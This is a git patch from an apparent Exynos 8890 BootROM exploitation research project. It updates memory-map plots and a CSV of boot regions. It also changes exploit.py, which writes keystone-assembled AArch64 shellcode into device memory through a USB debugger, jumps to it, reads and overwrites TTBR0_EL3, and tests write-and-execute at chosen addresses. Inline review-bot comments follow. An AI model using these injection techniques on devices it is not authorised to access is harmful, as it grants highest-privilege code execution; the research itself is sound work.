From e59478187dabab194d236703db3abdb837403209 Mon Sep 17 00:00:00 2001 From: Jonathan Herrewijnen Date: Thu, 29 Aug 2024 21:06:15 +0200 Subject: [PATCH] Loads and executes BL31, then returns debugger, then continues bootflow and enters recovery --- .../source/BootROM_8890/boot_chain.rst | 10 +- documentation/source/_ignore/draw_boot.ipynb | 850 ++++++++++++------ .../source/_ignore/stack_and_functions.csv | 6 +- .../source/_static/stack_and_functions.html | 14 + dump/reloc_debugger.bin | Bin 2608 -> 2612 bytes source/exploit/exploit.py | 67 +- 6 files changed, 658 insertions(+), 289 deletions(-) create mode 100644 documentation/source/_static/stack_and_functions.html diff --git a/documentation/source/BootROM_8890/boot_chain.rst b/documentation/source/BootROM_8890/boot_chain.rst index 5920ab3..3ea0d8f 100644 --- a/documentation/source/BootROM_8890/boot_chain.rst +++ b/documentation/source/BootROM_8890/boot_chain.rst @@ -4,9 +4,13 @@ Booting ======= This part describes the boot chain of the ``Exynos 8890`` SoC. -Booting Protocol -================ -TODO document normal samsung boot chain +Memory overview +=============== + +.. raw:: html + + + Exploitation ============ diff --git a/documentation/source/_ignore/draw_boot.ipynb b/documentation/source/_ignore/draw_boot.ipynb index eee3ddf..6049c1d 100644 --- a/documentation/source/_ignore/draw_boot.ipynb +++ b/documentation/source/_ignore/draw_boot.ipynb @@ -2,7 +2,7 @@ "cells": [ { "cell_type": "code", - "execution_count": 1, + "execution_count": 17, "metadata": {}, "outputs": [], "source": [ @@ -20,7 +20,7 @@ }, { "cell_type": "code", - "execution_count": 2, + "execution_count": 18, "metadata": {}, "outputs": [ { 
@@ -158,11 +158,24 @@ " NaN\n", " NaN\n", " 147456\n", - " False\n", + " True\n", " 7.0\n", " \n", " \n", " 8\n", + " 33773056\n", + " 33773064\n", + " TTBR0_EL3 address ptr\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 8\n", + " True\n", + " 7.0\n", + " \n", + " \n", + " 9\n", " 33849344\n", " 34008336\n", " BL2\n", @@ -172,10 +185,36 @@ " NaN\n", " 158992\n", " True\n", - " 8.0\n", + " 9.0\n", " \n", " \n", - " 9\n", + " 10\n", + " 33849344\n", + " 33872624\n", + " BL2 empty space?\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 23280\n", + " True\n", + " 9.0\n", + " \n", + " \n", + " 11\n", + " 33876736\n", + " 33876736\n", + " BL2 copy start/source\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 0\n", + " True\n", + " 9.0\n", + " \n", + " \n", + " 12\n", " 33984512\n", " 34009088\n", " Debugger\n", @@ -185,10 +224,10 @@ " NaN\n", " 24576\n", " True\n", - " 8.0\n", + " 9.0\n", " \n", " \n", - " 10\n", + " 13\n", " 34008336\n", " 34013184\n", " End/Start peripheral space?\n", @@ -198,10 +237,10 @@ " NaN\n", " 4848\n", " True\n", - " 9.0\n", + " 12.0\n", " \n", " \n", - " 11\n", + " 14\n", " 34340864\n", " 34369536\n", " Debugger relocated\n", @@ -211,10 +250,10 @@ " NaN\n", " 28672\n", " True\n", - " 11.0\n", + " 16.0\n", " \n", " \n", - " 12\n", + " 15\n", " 34340864\n", " 34340868\n", " _frederic_dest_ptr\n", @@ -224,10 +263,23 @@ " NaN\n", " 4\n", " True\n", - " 11.0\n", + " 14.0\n", " \n", " \n", - " 13\n", + " 16\n", + " 34349056\n", + " 34508048\n", + " BL2 load address?\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 158992\n", + " True\n", + " 16.0\n", + " \n", + " \n", + " 17\n", " 34371584\n", " 34373632\n", " modem_interface\n", @@ -236,11 +288,11 @@ " NaN\n", " NaN\n", " 2048\n", - " False\n", - " 13.0\n", + " True\n", + " 16.0\n", " \n", " \n", - " 14\n", + " 18\n", " 346816512\n", " 346836992\n", " mali@14AC0000\n", @@ -250,7 +302,7 @@ " NaN\n", " 20480\n", " False\n", - " 14.0\n", + " 18.0\n", " \n", " \n", "\n", 
@@ -266,13 +318,17 @@ "5 33689440 33689448 _boot_usb_ra NaN NaN NaN NaN \n", "6 33693696 33701888 BL1 NaN NaN NaN NaN \n", "7 33701888 33849344 BL31 NaN NaN NaN NaN \n", - "8 33849344 34008336 BL2 NaN NaN NaN NaN \n", - "9 33984512 34009088 Debugger NaN NaN NaN NaN \n", - "10 34008336 34013184 End/Start peripheral space? NaN NaN NaN NaN \n", - "11 34340864 34369536 Debugger relocated NaN NaN NaN NaN \n", - "12 34340864 34340868 _frederic_dest_ptr NaN NaN NaN NaN \n", - "13 34371584 34373632 modem_interface NaN NaN NaN NaN \n", - "14 346816512 346836992 mali@14AC0000 NaN NaN NaN NaN \n", + "8 33773056 33773064 TTBR0_EL3 address ptr NaN NaN NaN NaN \n", + "9 33849344 34008336 BL2 NaN NaN NaN NaN \n", + "10 33849344 33872624 BL2 empty space? NaN NaN NaN NaN \n", + "11 33876736 33876736 BL2 copy start/source NaN NaN NaN NaN \n", + "12 33984512 34009088 Debugger NaN NaN NaN NaN \n", + "13 34008336 34013184 End/Start peripheral space? NaN NaN NaN NaN \n", + "14 34340864 34369536 Debugger relocated NaN NaN NaN NaN \n", + "15 34340864 34340868 _frederic_dest_ptr NaN NaN NaN NaN \n", + "16 34349056 34508048 BL2 load address? NaN NaN NaN NaN \n", + "17 34371584 34373632 modem_interface NaN NaN NaN NaN \n", + "18 346816512 346836992 mali@14AC0000 NaN NaN NaN NaN \n", "\n", " size overlap overlap_with \n", "0 131072 True 0.0 \n", 
@@ -282,17 +338,21 @@ "4 28672 False 4.0 \n", "5 8 False 5.0 \n", "6 8192 False 6.0 \n", - "7 147456 False 7.0 \n", - "8 158992 True 8.0 \n", - "9 24576 True 8.0 \n", - "10 4848 True 9.0 \n", - "11 28672 True 11.0 \n", - "12 4 True 11.0 \n", - "13 2048 False 13.0 \n", - "14 20480 False 14.0 " + "7 147456 True 7.0 \n", + "8 8 True 7.0 \n", + "9 158992 True 9.0 \n", + "10 23280 True 9.0 \n", + "11 0 True 9.0 \n", + "12 24576 True 9.0 \n", + "13 4848 True 12.0 \n", + "14 28672 True 16.0 \n", + "15 4 True 14.0 \n", + "16 158992 True 16.0 \n", + "17 2048 True 16.0 \n", + "18 20480 False 18.0 " ] }, - "execution_count": 2, + "execution_count": 18, "metadata": {}, "output_type": "execute_result" } @@ -352,7 +412,7 @@ }, { "cell_type": "code", - "execution_count": 3, + "execution_count": 19, "metadata": {}, "outputs": [ { @@ -364,7 +424,7 @@ "data": [ { "marker": { - "color": "#46d3f4" + "color": "#0b977d" }, "mode": "text", "name": "BootROM", @@ -380,7 +440,7 @@ }, { "marker": { - "color": "#46d3f4" + "color": "#0b977d" }, "mode": "text", "showlegend": false, @@ -396,7 +456,7 @@ }, { "marker": { - "color": "#46d3f4" + "color": "#0b977d" }, "mode": "text", "showlegend": false, @@ -412,7 +472,7 @@ }, { "marker": { - "color": "#05f11d" + "color": "#4c1830" }, "mode": "text", "name": "_jump_bl1", @@ -428,7 +488,7 @@ }, { "marker": { - "color": "#05f11d" + "color": "#4c1830" }, "mode": "text", "showlegend": false, @@ -444,7 +504,7 @@ }, { "marker": { - "color": "#05f11d" + "color": "#4c1830" }, "mode": "text", "showlegend": false, @@ -460,7 +520,7 @@ }, { "marker": { - "color": "#15ef8e" + "color": "#5d2e02" }, "mode": "text", "name": "_boot_usb", @@ -476,7 +536,7 @@ }, { "marker": { - "color": "#15ef8e" + "color": "#5d2e02" }, "mode": "text", "showlegend": false, @@ -492,7 +552,7 @@ }, { "marker": { - "color": "#15ef8e" + "color": "#5d2e02" }, "mode": "text", "showlegend": false, 
@@ -508,7 +568,7 @@ }, { "marker": { - "color": "#d1cb9b" + "color": "#5e6e3f" }, "mode": "text", "name": "auth_bl1", @@ -524,7 +584,7 @@ }, { "marker": { - "color": "#d1cb9b" + "color": "#5e6e3f" }, "mode": "text", "showlegend": false, @@ -540,7 +600,7 @@ }, { "marker": { - "color": "#d1cb9b" + "color": "#5e6e3f" }, "mode": "text", "showlegend": false, @@ -556,7 +616,7 @@ }, { "marker": { - "color": "#bafebb" + "color": "#85ca4e" }, "mode": "text", "name": "Tried debugger space", @@ -572,7 +632,7 @@ }, { "marker": { - "color": "#bafebb" + "color": "#85ca4e" }, "mode": "text", "showlegend": false, @@ -588,7 +648,7 @@ }, { "marker": { - "color": "#bafebb" + "color": "#85ca4e" }, "mode": "text", "showlegend": false, @@ -604,7 +664,7 @@ }, { "marker": { - "color": "#b21068" + "color": "#d2f956" }, "mode": "text", "name": "_boot_usb_ra", @@ -620,7 +680,7 @@ }, { "marker": { - "color": "#b21068" + "color": "#d2f956" }, "mode": "text", "showlegend": false, @@ -636,7 +696,7 @@ }, { "marker": { - "color": "#b21068" + "color": "#d2f956" }, "mode": "text", "showlegend": false, @@ -652,7 +712,7 @@ }, { "marker": { - "color": "#d43e00" + "color": "#55fe0e" }, "mode": "text", "name": "BL1", @@ -668,7 +728,7 @@ }, { "marker": { - "color": "#d43e00" + "color": "#55fe0e" }, "mode": "text", "showlegend": false, @@ -684,7 +744,7 @@ }, { "marker": { - "color": "#d43e00" + "color": "#55fe0e" }, "mode": "text", "showlegend": false, @@ -700,7 +760,7 @@ }, { "marker": { - "color": "#2fcf29" + "color": "#b0d635" }, "mode": "text", "name": "BL31", @@ -716,7 +776,7 @@ }, { "marker": { - "color": "#2fcf29" + "color": "#b0d635" }, "mode": "text", "showlegend": false, @@ -724,15 +784,15 @@ "textposition": "middle center", "type": "scatter", "x": [ - 1.2400000000000002 + 1.1400000000000001 ], "y": [ - 7.84 + 8.84 ] }, { "marker": { - "color": "#2fcf29" + "color": "#b0d635" }, "mode": "text", "showlegend": false, 
@@ -740,7 +800,7 @@ "textposition": "middle center", "type": "scatter", "x": [ - 1.2400000000000002 + 1.1400000000000001 ], "y": [ 7.14 @@ -748,7 +808,55 @@ }, { "marker": { - "color": "#7ac7dc" + "color": "#beec90" + }, + "mode": "text", + "name": "TTBR0_EL3 address ptr", + "text": "TTBR0_EL3 address ptr", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 8.52 + ] + }, + { + "marker": { + "color": "#beec90" + }, + "mode": "text", + "showlegend": false, + "text": "0x2035608", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 8.709999999999999 + ] + }, + { + "marker": { + "color": "#beec90" + }, + "mode": "text", + "showlegend": false, + "text": "0x2035600", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 8.16 + ] + }, + { + "marker": { + "color": "#65a13c" }, "mode": "text", "name": "BL2", @@ -759,12 +867,12 @@ 2.5 ], "y": [ - 8.5 + 9.5 ] }, { "marker": { - "color": "#7ac7dc" + "color": "#65a13c" }, "mode": "text", "showlegend": false, 
@@ -774,177 +882,129 @@ "x": [ 1.1400000000000001 ], - "y": [ - 9.34 - ] - }, - { - "marker": { - "color": "#7ac7dc" - }, - "mode": "text", - "showlegend": false, - "text": "0x2048000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.1400000000000001 - ], - "y": [ - 8.14 - ] - }, - { - "marker": { - "color": "#1a256d" - }, - "mode": "text", - "name": "Debugger", - "text": "Debugger", - "textposition": "middle center", - "type": "scatter", - "x": [ - 2.5 - ], - "y": [ - 9.52 - ] - }, - { - "marker": { - "color": "#1a256d" - }, - "mode": "text", - "showlegend": false, - "text": "0x206f000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 9.709999999999999 - ] - }, - { - "marker": { - "color": "#1a256d" - }, - "mode": "text", - "showlegend": false, - "text": "0x2069000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 9.16 - ] - }, - { - "marker": { - "color": "#b0eb7f" - }, - "mode": "text", - "name": "End/Start peripheral space?", - "text": "End/Start peripheral space?", - "textposition": "middle center", - "type": "scatter", - "x": [ - 2.5 - ], - "y": [ - 10.52 - ] - }, - { - "marker": { - "color": "#b0eb7f" - }, - "mode": "text", - "showlegend": false, - "text": "0x2070000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 10.709999999999999 - ] - }, - { - "marker": { - "color": "#b0eb7f" - }, - "mode": "text", - "showlegend": false, - "text": "0x206ed10", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 10.16 - ] - }, - { - "marker": { - "color": "#e42eab" - }, - "mode": "text", - "name": "Debugger relocated", - "text": "Debugger relocated", - "textposition": "middle center", - "type": "scatter", - "x": [ - 2.5 - ], - "y": [ - 11.5 - ] - }, - { - "marker": { - "color": "#e42eab" - }, - "mode": "text", - "showlegend": false, - 
"text": "0x20c7000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.1400000000000001 - ], "y": [ 12.84 ] }, { "marker": { - "color": "#e42eab" + "color": "#65a13c" }, "mode": "text", "showlegend": false, - "text": "0x20c0000", + "text": "0x2048000", "textposition": "middle center", "type": "scatter", "x": [ 1.1400000000000001 ], "y": [ - 11.14 + 9.14 ] }, { "marker": { - "color": "#b86b0c" + "color": "#177b8d" }, "mode": "text", - "name": "_frederic_dest_ptr", - "text": "_frederic_dest_ptr", + "name": "BL2 empty space?", + "text": "BL2 empty space?", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 10.52 + ] + }, + { + "marker": { + "color": "#177b8d" + }, + "mode": "text", + "showlegend": false, + "text": "0x204daf0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 10.709999999999999 + ] + }, + { + "marker": { + "color": "#177b8d" + }, + "mode": "text", + "showlegend": false, + "text": "0x2048000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 10.16 + ] + }, + { + "marker": { + "color": "#9e7028" + }, + "mode": "text", + "name": "BL2 copy start/source", + "text": "BL2 copy start/source", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 11.52 + ] + }, + { + "marker": { + "color": "#9e7028" + }, + "mode": "text", + "showlegend": false, + "text": "0x204eb00", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.709999999999999 + ] + }, + { + "marker": { + "color": "#9e7028" + }, + "mode": "text", + "showlegend": false, + "text": "0x204eb00", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.16 + ] + }, + { + "marker": { + "color": "#7df722" + }, + "mode": "text", + "name": "Debugger", + "text": "Debugger", "textposition": "middle center", "type": "scatter", 
"x": [ @@ -956,11 +1016,11 @@ }, { "marker": { - "color": "#b86b0c" + "color": "#7df722" }, "mode": "text", "showlegend": false, - "text": "0x20c0004", + "text": "0x206f000", "textposition": "middle center", "type": "scatter", "x": [ @@ -972,11 +1032,11 @@ }, { "marker": { - "color": "#b86b0c" + "color": "#7df722" }, "mode": "text", "showlegend": false, - "text": "0x20c0000", + "text": "0x2069000", "textposition": "middle center", "type": "scatter", "x": [ 
@@ -988,7 +1048,199 @@ }, { "marker": { - "color": "#625596" + "color": "#c9c022" + }, + "mode": "text", + "name": "End/Start peripheral space?", + "text": "End/Start peripheral space?", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 13.52 + ] + }, + { + "marker": { + "color": "#c9c022" + }, + "mode": "text", + "showlegend": false, + "text": "0x2070000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 13.709999999999999 + ] + }, + { + "marker": { + "color": "#c9c022" + }, + "mode": "text", + "showlegend": false, + "text": "0x206ed10", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 13.16 + ] + }, + { + "marker": { + "color": "#db6aa0" + }, + "mode": "text", + "name": "Debugger relocated", + "text": "Debugger relocated", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 14.52 + ] + }, + { + "marker": { + "color": "#db6aa0" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c7000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 14.709999999999999 + ] + }, + { + "marker": { + "color": "#db6aa0" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 14.16 + ] + }, + { + "marker": { + "color": "#678572" + }, + "mode": "text", + "name": "_frederic_dest_ptr", + "text": "_frederic_dest_ptr", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 15.52 + ] + }, + { + "marker": { + "color": "#678572" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0004", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 15.709999999999999 + ] + }, + { + "marker": { + "color": "#678572" + }, + "mode": "text", + "showlegend": false, + 
"text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 15.16 + ] + }, + { + "marker": { + "color": "#ac9800" + }, + "mode": "text", + "name": "BL2 load address?", + "text": "BL2 load address?", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 16.5 + ] + }, + { + "marker": { + "color": "#ac9800" + }, + "mode": "text", + "showlegend": false, + "text": "0x20e8d10", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 18.84 + ] + }, + { + "marker": { + "color": "#ac9800" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c2000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 16.14 + ] + }, + { + "marker": { + "color": "#32af54" }, "mode": "text", "name": "modem_interface", @@ -999,12 +1251,12 @@ 2.5 ], "y": [ - 13.5 + 17.52 ] }, { "marker": { - "color": "#625596" + "color": "#32af54" }, "mode": "text", "showlegend": false, @@ -1015,12 +1267,12 @@ 1.2400000000000002 ], "y": [ - 13.84 + 17.71 ] }, { "marker": { - "color": "#625596" + "color": "#32af54" }, "mode": "text", "showlegend": false, @@ -1031,12 +1283,12 @@ 1.2400000000000002 ], "y": [ - 13.14 + 17.16 ] }, { "marker": { - "color": "#5b6129" + "color": "#34b9f5" }, "mode": "text", "name": "mali@14AC0000", @@ -1047,12 +1299,12 @@ 2.5 ], "y": [ - 14.5 + 18.5 ] }, { "marker": { - "color": "#5b6129" + "color": "#34b9f5" }, "mode": "text", "showlegend": false, @@ -1063,12 +1315,12 @@ 1.2400000000000002 ], "y": [ - 14.84 + 18.84 ] }, { "marker": { - "color": "#5b6129" + "color": "#34b9f5" }, "mode": "text", "showlegend": false, @@ -1079,7 +1331,7 @@ 1.2400000000000002 ], "y": [ - 14.14 + 18.14 ] } ], @@ -1102,7 +1354,7 @@ }, "shapes": [ { - "fillcolor": "#46d3f4", + "fillcolor": "#0b977d", "layer": "below", "line": { "width": 2 
@@ -1115,7 +1367,7 @@ "y1": 3.92 }, { - "fillcolor": "#05f11d", + "fillcolor": "#4c1830", "layer": "below", "line": { "width": 2 @@ -1128,7 +1380,7 @@ "y1": 1.79 }, { - "fillcolor": "#15ef8e", + "fillcolor": "#5d2e02", "layer": "below", "line": { "width": 2 @@ -1141,7 +1393,7 @@ "y1": 2.79 }, { - "fillcolor": "#d1cb9b", + "fillcolor": "#5e6e3f", "layer": "below", "line": { "width": 2 @@ -1154,7 +1406,7 @@ "y1": 3.79 }, { - "fillcolor": "#bafebb", + "fillcolor": "#85ca4e", "layer": "below", "line": { "width": 2 @@ -1167,7 +1419,7 @@ "y1": 4.92 }, { - "fillcolor": "#b21068", + "fillcolor": "#d2f956", "layer": "below", "line": { "width": 2 @@ -1180,7 +1432,7 @@ "y1": 5.92 }, { - "fillcolor": "#d43e00", + "fillcolor": "#55fe0e", "layer": "below", "line": { "width": 2 @@ -1193,20 +1445,7 @@ "y1": 6.92 }, { - "fillcolor": "#2fcf29", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 4, - "y0": 7.08, - "y1": 7.92 - }, - { - "fillcolor": "#7ac7dc", + "fillcolor": "#b0d635", "layer": "below", "line": { "width": 2 @@ -1215,11 +1454,11 @@ "type": "rect", "x0": 0.9, "x1": 4.1, - "y0": 8.08, - "y1": 9.42 + "y0": 7.08, + "y1": 8.92 }, { - "fillcolor": "#1a256d", + "fillcolor": "#beec90", "layer": "below", "line": { "width": 2 @@ -1228,11 +1467,24 @@ "type": "rect", "x0": 1, "x1": 4, - "y0": 9.1, - "y1": 9.79 + "y0": 8.1, + "y1": 8.79 }, { - "fillcolor": "#b0eb7f", + "fillcolor": "#65a13c", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 0.9, + "x1": 4.1, + "y0": 9.08, + "y1": 12.92 + }, + { + "fillcolor": "#177b8d", "layer": "below", "line": { "width": 2 
@@ -1245,20 +1497,20 @@ "y1": 10.79 }, { - "fillcolor": "#e42eab", + "fillcolor": "#9e7028", "layer": "below", "line": { "width": 2 }, "opacity": 0.5, "type": "rect", - "x0": 0.9, - "x1": 4.1, - "y0": 11.08, - "y1": 12.92 + "x0": 1, + "x1": 4, + "y0": 11.1, + "y1": 11.79 }, { - "fillcolor": "#b86b0c", + "fillcolor": "#7df722", "layer": "below", "line": { "width": 2 @@ -1271,7 +1523,7 @@ "y1": 12.79 }, { - "fillcolor": "#625596", + "fillcolor": "#c9c022", "layer": "below", "line": { "width": 2 @@ -1280,11 +1532,11 @@ "type": "rect", "x0": 1, "x1": 4, - "y0": 13.08, - "y1": 13.92 + "y0": 13.1, + "y1": 13.79 }, { - "fillcolor": "#5b6129", + "fillcolor": "#db6aa0", "layer": "below", "line": { "width": 2 @@ -1293,8 +1545,60 @@ "type": "rect", "x0": 1, "x1": 4, - "y0": 14.08, - "y1": 14.92 + "y0": 14.1, + "y1": 14.79 + }, + { + "fillcolor": "#678572", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 15.1, + "y1": 15.79 + }, + { + "fillcolor": "#ac9800", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 0.9, + "x1": 4.1, + "y0": 16.08, + "y1": 18.92 + }, + { + "fillcolor": "#32af54", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 17.099999999999998, + "y1": 17.790000000000003 + }, + { + "fillcolor": "#34b9f5", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 18.08, + "y1": 18.92 } ], "template": { @@ -2152,7 +2456,11 @@ 11, 12, 13, - 14 + 14, + 15, + 16, + 17, + 18 ] } } @@ -2316,7 +2624,7 @@ }, { "cell_type": "code", - "execution_count": 4, + "execution_count": 20, "metadata": {}, "outputs": [], "source": [ diff --git a/documentation/source/_ignore/stack_and_functions.csv b/documentation/source/_ignore/stack_and_functions.csv index e08664f..965aafe 100644 --- a/documentation/source/_ignore/stack_and_functions.csv 
+++ b/documentation/source/_ignore/stack_and_functions.csv @@ -10,7 +10,11 @@ start,end,name,order,comment,X0,LR 0x02048000,0x0206ed10,BL2,,,, 0x02069000,0x0206f000,Debugger,,,, 0x020c0000,0x020c7000,Debugger relocated,,,, +0x02048000,0x0204daf0,BL2 empty space?,,,, +0x0204eb00,0x0204eb00,BL2 copy start/source,,,, +0x020c2000,0x020e8d10,BL2 load address?,,,, 0x0206ed10,0x02070000,End/Start peripheral space?,,,, 0x02019e5c,0x02020e5c,Tried debugger space,,,, 0x020C7800,0x020C8000,modem_interface,,,, -0x14AC0000,0x14ac5000,mali@14AC0000,,,, \ No newline at end of file +0x14AC0000,0x14ac5000,mali@14AC0000,,,, +0x2035600,0x2035608,TTBR0_EL3 address ptr,,,, \ No newline at end of file diff --git a/documentation/source/_static/stack_and_functions.html b/documentation/source/_static/stack_and_functions.html new file mode 100644 index 0000000..5d0abee --- /dev/null +++ b/documentation/source/_static/stack_and_functions.html @@ -0,0 +1,14 @@ + + + +
+
+ + \ No newline at end of file diff --git a/dump/reloc_debugger.bin b/dump/reloc_debugger.bin index 6644fb07a87722f72861d6767530da8a29c9915a..aa710721f70adec8d5c34cba8c7263d07bdbaaa7 100755 GIT binary patch delta 331 zcmdlWvPERV9L9wk=Y}(Ju4iBn+4TSa^tF@!GR>@*)Nx+W-)hE{f1Md7er9IW zy5g{)Xt`|dbYn&a6E22%K^!#>lV36mYn=j$bBj7yXtFYV^cH2XSor^chz3JLPzMvs zWNsFzc!haEj0_ADJ~K0{x(ZaPsK7tb0Vw^5Sw!n^HPgz!%?uOwGcj16ld7E#67K|B z@sOE83#LXF$iD!@E0`QCKTP7DZN|9VZ+nuVRt5f!g*3 zX4?Xxi3(ubgi&l;2DA+%{t#%&BcLbPfi|p~%*eWhalzzmtmd3aViSwEiA}tAX!AGL pSB#9dn;){?L|!e?fNRa1f56&3g=Isl~~F^g#Zt!7&Jx0zw$ekKOX^HR0bLE>FN;~z3J zXu;Iz0r?jv=dwrwt(n}xqR0v~ufuWjIu>agsL5YoCQlHWr~o!u7{%n}K$Ah@4}ms5 z0y>xjXyWS0tgKrYCrsYOYR(xXHnDh_*u-m_HveLM#mH#4`6;_SBjeo3s+{{7T_!)} Vl;^bj_ka5TfB(f}Ci8Ns0{|KWZ65#t diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index af1a0be..d77566f 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -385,7 +385,7 @@ class ExynosDevice(): _setup_debugger() - def relocate_debugger(self, debugger=None, entry=0x020c0000, storage=0x020c4000, g_data_received=0x020c6000): + def relocate_debugger(self, debugger=None, entry=0x020c0000, storage=0x020c4000, g_data_received=0x020c6000, alternative_size=0x1000): """ Relocates the debugger to another location. Make sure to have built the debugger with the correct addresses! @@ -411,7 +411,7 @@ class ExynosDevice(): # self.usb_write(b"FLSH") # Flush cache self.cd.restore_stack_and_jump(entry) assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" - self.cd.relocate_debugger(g_data_received+0x1000, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000 + self.cd.relocate_debugger(g_data_received+alternative_size, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000 def dumb_interact(self, dump_imems=False): @@ -553,7 +553,7 @@ class ExynosDevice(): shellcode = f""" ldr x0, debugger_addr blr x0 - debugger_addr: .quad 0x020c0000 + debugger_addr: .quad 0x02022000 """ shellcode = ks.asm(shellcode, as_bytes=True)[0] 
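Review bot: The new `alternative_size` keyword of `relocate_debugger` is not mentioned in the docstring that starts right under the signature, and the trailing comment `#0x20c7000, 0x20c0000, 0x20c4000` on the `self.cd.relocate_debugger(...)` line now only holds for the default `0x1000`. Add a line to the docstring such as `alternative_size: added to g_data_received to form the first argument of cd.relocate_debugger (default 0x1000)`, stating what that first argument means, and either drop the stale comment or rephrase it as `# with defaults: 0x20c7000, 0x20c0000, 0x20c4000`. The name says nothing about what the value is; something like `reloc_offset` would read better, but since it is a keyword argument any rename has to update callers too. The body of relocate_debugger runs outside both of these hunks.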
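Review bot: `debugger_addr: .quad 0x02022000` hard-codes a new address into the shellcode with no comment saying what lives there, and `0x02022000` appears nowhere else in the diff — the stack_and_functions.csv in this same commit lists neither it nor a region covering it. Since `shellcode` is already an f-string, interpolate the value from a named source instead, e.g. `debugger_addr: .quad {hex(debugger_addr)}` with `debugger_addr` a parameter of the enclosing method or the constant used when the debugger was placed there, so the jump target and the relocation cannot drift apart silently. The enclosing method starts and ends outside the hunk.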
@@ -579,25 +579,49 @@ class ExynosDevice():
 # self.cd.restore_stack_and_jump(0x000125b4)
 def get_ttbr0_el3(self):
+ """
+ Get the TTBR0_EL3 register using opcode.
+ """
 shellcode= f"""
 mov x1, lr
 mrs x0, ttbr0_el3
- ldr x2, =0x020c1000
+ ldr x2, =0x206fd10
 str x0, [x2]
 mov lr, x1
 ret
 """
 shellcode = ks.asm(shellcode, as_bytes=True)[0]
- self.cd.memwrite_region(0x020c0000, shellcode)
- self.cd.jump_to(0x020c0000)
- ttbr0 = u64(self.cd.memdump_region(0x020c1000, 8))
+ self.cd.memwrite_region(0x206ed10, shellcode)
+ self.cd.jump_to(0x0206ed10)
+ ttbr0 = u64(self.cd.memdump_region(0x0206fd10, 0x8))
 print(f"TTBR0_EL3: {hex(ttbr0)}")
 print(f"Bits: {ttbr0:064b}")
 # Overwrite it with 0's
- self.cd.memwrite_region(0x020c1000, b"\x00" * 8)
- ttbr0 = self.cd.memdump_region(0x020c1000, 8)
- assert ttbr0 == b"\x00" * 8, "TTBR0_EL3 not overwritten"
+ self.cd.memwrite_region(0x0206ed10, b"\x00" * 0x8)
+ ttbr0 = self.cd.memdump_region(0x206ed10, 0x8)
+ assert ttbr0 == b"\x00" * 0x8, "TTBR0_EL3 not overwritten"
+
+
+ def test_write_execute(self, address):
+ """
+ At given address, test if it is possible to write and execute code, by writing a simple jump to, and jump back.
+ """
+
+ self.usb_write(b'PING')
+ assert self.usb_read(0x200) == b'PONG', "Debugger not alive before test"
+
+ shellcode = f"""
+ mov x1, lr
+ ret
+ """
+
+ shellcode = ks.asm(shellcode, as_bytes=True)[0]
+ self.cd.memwrite_region(address, shellcode)
+ self.cd.jump_to(address)
+ self.usb_write(b"PING")
+ assert self.usb_read(0x200) == b"PONG", "Failed to jump back to debugger"
